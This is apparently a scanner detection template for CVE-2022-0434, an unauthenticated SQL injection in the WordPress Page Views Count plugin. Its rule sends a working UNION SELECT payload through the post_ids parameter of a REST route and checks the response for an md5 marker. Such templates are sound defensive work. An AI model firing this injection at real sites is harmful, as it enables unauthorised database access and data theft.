id: CVE-2022-0434

info:
  name: WordPress Page Views Count <2.4.15 - SQL Injection
  author: theamanrawat
  severity: critical
  verified: true
  description: |
    WordPress Page Views Count plugin prior to 2.4.15 contains an unauthenticated SQL injection vulnerability.  It does not sanitise and escape the post_ids parameter before using it in a SQL statement via a REST endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://wpscan.com/vulnerability/be895016-7365-4ce4-a54f-f36d0ef2d6f1
    - https://wordpress.org/plugins/page-views-count/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0434
  tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wpscan,unauth
  created: 2023/06/22

set:
    rInt0: string(randomInt(10000, 99999))
rules:
    r0:
        request:
            method: GET
            path: /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5({{rInt0}}),null,null%20--%20g
        expression: response.status == 200 && response.body.bcontains(bytes(md5(rInt0)))
expression: r0()
